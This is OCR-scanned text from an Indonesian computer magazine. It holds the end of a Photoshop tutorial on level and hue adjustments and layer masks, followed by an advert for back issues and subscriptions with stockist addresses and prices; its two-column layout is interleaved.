FINISHING • Bila anda ingin membuang bagian yang tidak diinginkan dari
22 • Level pencahayaan foto ini dirasa kurang pas, untuk meng-
customize level-nya kita lakukan adjustment pada foto ini
foto tersebut, sebaiknya gunakan mask dan hindari menggu-
nakan erase tool. Dengan mask kita bisa me-restore kembali
agar terlihat lebih baik. Caranya Image > Adjustment > Level. apa yang telah kita hilangkan.
Setelah itu atur ketiga point yang ada di slide. Cara menggunakan mask:
• Pilih layer foto, lalu klik tombol Add layer mask pada layer palete.
Keterangan: • Tekan d untuk men-default-kan warna (hitam sebagai foreground
• Point yang paling kiri adalah untuk menentukan black point dan putih sebagai background).
• Point yang paling kanan adalah untuk mementukan white point • Gunakan brush tool, klik kanan untuk menampilkan Properties-nya
Sulit menjelaskan secara detail. Cara terbaik adalah dengan dan gunakan brush soft round, yang ukurannya sesuaikan dengan
mencobanya sendiri. Lakukan coba-coba menggeser bagian keadaan foto. Untuk ini saya gunakan 40 px.
kiri, tengah, atau kanan dan perhatikan perbedaannya. Ter- • Kini lukis daerah yang ingin dihilangkan dengan brush tool tsb
kadang hanya perlu melakukan perubahan sedikit saja pada • Sekarang ubah opacity dari layer foto sampai terlihat memu-
point yang ditengah. Cara coba-coba lazim digunakan, karena dar. Hal ini dimaksudkan suapa nantinya kombinasi warna
tidak ada acuan pasti. text dan background menjadi serasi.
• Sekarang kita ubah warna foto ini menjadi biru (menyesuai- Di bagian kiri bawah masih terlihat kosong, anda bisa mem-
kan dengan warna yang lain). Caranya Image > Adjustment > biarkannya atau lebih baik mengisinya dengan sesuatu, bisa
Hue/Saturation (Ctrl+U), tick opsi Colorise kemudian geser shapes/bentuk,logo, atau foto anda. Caranya sama seperti
slide Hue untuk mengatur warnanya sehingga menjadi biru pada waktu kita memasukkan foto tadi. Apabila ukurannya
(biasanya di daerah tengah), atur Saturation untuk mengatur terlalu besar maka bisa di-resize dengan hot key Crtl+t.
muda/tuanya warna, kemudian Lightness untuk mengatur
intensitas cahaya. Bila semuanya sudah pas sesuai dengan
yang diinginkan, klik OK. Ingat untuk background yang
Selesai sudah tugas PhotoShop sampai di sini dan ja-
nantinya akan diisi dengan teks berwarna gelap, background- ngan lupa untuk menyimpan hasil karya anda dalam
nya harus berwarna soft dan terang serta pudar. format .PSD. Pada suatu saat apabila perlu dilakukan
editing dapatdengan mudah dikerjakan.

48 NeoTek Vol. IV No. 05


Ketinggalan Membaca NeoTek?
EOTEK DENGAN ARTIKEL-ARTIKEL Aswan Bakri NeoTek di stockist dijual dengan cover
N hacking, security, programming,
maupun sekedar memanfaat-
BCA KCP Rawamangun
No. rek. 0940544131
price sebagai berikut:
Vol. I (tanpa CD) No. 1 s/d 9, Rp6500,-
kan software pada dasarnya tidak akan Dapatkan dari Stockist Vol. I (tanpa CD) No. 10 s/d 12, Rp9500,-
pernah basi dan layak dikoleksi. Vol. II (+CD) No. 1 s/d 12, Rp19.500,-
Untuk yang berada di luar Jakarta, Vol. III (+CD) No. 1 s/d 12, Rp19.500,-
Tetapi bagaimana apabila anda baru- menghubungi NeoTek di Jakarta akan Vol. IV (+CD) No. 1 s/d 3, Rp19.500,-
baru ini saja tahu adanya NeoTek, membawa kerepotan selain juga harus Vol. IV (+CD) No. 4 dst., Rp20.000,- (P.
atau edisi lama NeoTek ataupun CD- menanggung ongkos kirim. Untuk itu Jawa) dan Rp22.000,- (Luar P. Jawa)
nya hilang, dipinjam tidak dikemba- NeoTek tersedia di beberapa kota sbb:
likan, ataupun rusak? Berlangganan
Bandung
Dapatkan di Pameran CV Angkasa Untuk menjamin bahwa anda tidak
Jl. Merdeka No. 6 lagi ketinggalan edisi NeoTek, paling
NeoTek selalu hadir di pameran-pameran Bandung 40111 baik berlangganan. Untuk itu hubungi:
komputer di Jakarta. (M Mega Bazaar Tel. 021-4204795, 4208955 KRISHNAdiSTRIBUTOR
Computer, Festival Komputer Indo- Fax. 022-4239183 Tel. (021) 5835 0080
nesia, dan IndoComtech). Semarang HP. (0816) 1187 111 (Boedi)
Dapatkan Langsung Lestat email: krishnadistributor@neotek.co.id
Jl. Kaligarang 2B Kontak: Boedi Krishnadi
Cara pasti adalah mendapatkan lang- Semarang 50237 BCA No. rek.. 342-239-1611
sung dari NeoTek dengan menghubungi: Tel. 024-8411489 Harga NeoTek+CD mulai edisi IV/04:
PT NeoTek Maju Mandiri Fax. 024-8445211 Rp20.000,- ( P. Jawa)
Gedung Cahaya Palmerah 503 Yogyakarta Rp22.000,- (Luar P. Jawa)
Jl. Palmerah Utara III/9 Sumarno Ongkos kirim gratis untuk DKI Jakarta,
Jakarta 11480 Jl. Garuda, Desa Jaranan RT10/41 sedangkan untuk luar DKI Jakarta,
Telp. 021-5481457, Fax. 021-5329041 Kec. Bangun Tapan Rp6500,- per eksemplar.
Marni)
email: redaksi@neotek.co.id (M Bantul
Keuntungannya anda dapat memesan Surabaya Ingin Menjadi Stockist?
majalah+CD, majalah saja, atau CD Toko Buku URANUS Yang berminat berinvestasi sedikit
saja, tetapi anda akan dibebani ongkos Jl. Ngagel Jaya 89-91 dalam distribusi NeoTek, silakan
kirim, selain harus mengirim uang Surabaya hubungi pemasaran@neotek.co.id
terlebih dahulu ke rekening: Tel. 031-5681388

Iklan visionnet